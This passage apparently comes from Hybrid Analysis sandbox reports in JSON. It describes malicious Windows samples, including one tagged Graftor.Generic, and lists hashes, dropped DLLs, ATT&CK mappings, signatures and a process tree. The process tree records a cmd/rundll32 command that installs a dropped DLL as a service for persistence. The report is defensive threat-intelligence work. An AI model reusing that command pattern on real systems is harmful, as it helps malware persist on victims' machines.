00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"RemoveDirectoryA\" (Indicator: \"RemoveDirectory\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-87", "relevance": 1, "name": "Imports system security related APIs", "description": "Observed import api \"SetFileSecurityW\" which can \"Sets the security of a file or directory object\" [Source: 234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c]", "origin": "Static Parser", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-230", "type": 2, "relevance": 1, "name": "Contains ability to delete registry key/value (API string)", "description": "Found reference to API \"SHDeleteKeyA\" (Indicator: \"SHDeleteKey\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"SHDeleteKeyA\" (Indicator: \"SHDeleteKey\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-97", "type": 2, "relevance": 3, "name": "Contains ability to use security policy setting (API string)", "description": "Found reference to API \"SeSecurityPrivilege\" (Indicator: \"SeSecurityPrivilege\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"SeSecurityPrivilege\" (Indicator: \"SeSecurityPrivilege\"; Source: \"00000000-00005280.00000000.138163.00412000.00000040.mdmp, 00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00412000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" reads file \"C:\\Windows\\win.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" has an entrypoint in section \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegCloseKey\n OpenProcessToken\n RegOpenKeyExA\n GetFileAttributesA\n LoadLibraryA\n FindNextFileA\n GetVersionExA\n GetFileAttributesW\n GetModuleFileNameA\n CreateDirectoryA\n DeleteFileA\n CreateDirectoryW\n DeleteFileW\n GetProcAddress\n GetTempPathA\n GetModuleHandleA\n FindNextFileW\n WriteFile\n FindFirstFileA\n GetCommandLineA\n FindFirstFileW\n CreateFileW\n Sleep\n CreateFileA\n GetTickCount\n FindResourceA\n ShellExecuteExA\n FindWindowExA", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "string-309", "type": 2, "relevance": 1, "name": "Contains ability to modify thread functionality - possible hijack (API string)", "description": "Found reference to API \"OpenThread\" (Indicator: \"OpenThread\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"OpenThread\" (Indicator: \"OpenThread\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" has section name .tc with entropy \"6.48439871569\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"FileTimeToLocalFileTime\" with parameter 00bc9ac6937bdb01 & 00245f289c7bdb01 (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-40", "type": 6, "relevance": 10, "name": "Calls an API typically used for keylogging", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"16\"}", "origin": "API Call", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "memorydump-6", "type": 20, "relevance": 3, "name": "References HTTP requests in memory", "description": "Found HTTP requests \"GET %s?%s HTTP/1.1\" in memory - Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp\")\n Found HTTP requests \"GET %s?%s HTTP/1.1\" in memory - Source: \"00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "stream-88", "type": 1, "relevance": 1, "name": "Contains ability to terminate a process", "description": "ExitProcess@KERNEL32.DLL at 00000000-00005280-35015-22-0040C680", "origin": "Hybrid Analysis Technology", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_90% (W)", "origin": "External System"}]}
c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4
https://hybrid-analysis.com/sample/c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4
Hybrid Analysis - Killers
{"size": 126976, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4", "sha256": "c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4", "av_detect": 87, "vx_family": "Graftor.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 132, "extracted_files": [{"name": "908501218x27.dll", "file_path": "%TEMP%\\908501218x27.dll", "file_size": 27176, "sha256": "c2a955f9c92ffd941e89e269bbe2e46c55849184c4f9ca13adf5268d604f78d7", "type_tags": ["pedll", "executable"], "description": "PE32 executable (DLL) (GUI) Intel 80386, for MS Windows", "runtime_process": "c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe (PID: 4528)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "x27x.dll", "file_path": "%TEMP%\\x27x.dll", "file_size": 26624, "sha256": "362d87ada714ae14d6c6d2ad7935382ae3285c3ed99233c13e900d451962d3e3", "type_tags": ["pedll", "executable"], "description": "PE32 executable (DLL) (GUI) Intel 80386, for MS Windows", "runtime_process": "c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe (PID: 4528)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .RES Files linked with CVTRES.EXE 5.00 (Visual Studio 5) (build: 1720)", "2 .CPP Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)", "7 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 2179)"], "imported_objects": ["2 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 8168)"], "file_analysis": ["File contains C++ code", "File is the product of a small codebase (2 files)"], "total_file_compositions_imports": 47}, "processes": [{"uid": "00000000-00004528", "name": "c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe", "normalized_path": "C:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe", "sha256": "c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4", "av_label": "Gen:Variant.Graftor", "av_matched": 16, "av_total": 22}, {"uid": "00000000-00004936", "parentuid": "00000000-00004528", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "cmd /c %WINDIR%\\system32\\rundll32.exe %TEMP%\\x27x.dll,InstallService C:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004920", "parentuid": "00000000-00004936", "name": "rundll32.exe", "normalized_path": "%WINDIR%\\system32\\rundll32.exe", "command_line": "%TEMP%\\x27x.dll,InstallService C:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe", "sha256": "3fa4912eb43fc304652d7b01f118589259861e2d628fa7c86193e54d5f987670"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 16}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Rundll32", "attck_id": "T1218.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/011", "malicious_identifiers_count": 1, "parent": {"technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over C2 Channel", "attck_id": "T1041", "attck_id_wiki": "https://attack.mitre.org/techniques/T1041", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"WinExec\" (Indicator: \"WinExec\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"WinExec\" (Indicator: \"WinExec\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API \"4975077446,4556,3135,,WinExec,kernel32.dll,\"252:21:42.185\",RX=0,PX=0\" (Indicator: \"WinExec\"; Source: \"00000000-00004528.00000000.138693.00300000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileMappingA\" (Indicator: \"CreateFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"CreateFileMappingA\" (Indicator: \"CreateFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache\" in Source: c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\n \"Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache\" in Source: 00000000-00004528.00000000.138693.00402000.00000040.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"ElevateCreateProcess\" (Indicator: \"CreateProcess\"; Source: \"00000000-00004920.00000000.138847.002E0000.00000004.mdmp\")\n Found reference to API \"CreateProcessW\" (Indicator: \"CreateProcess\"; Source: 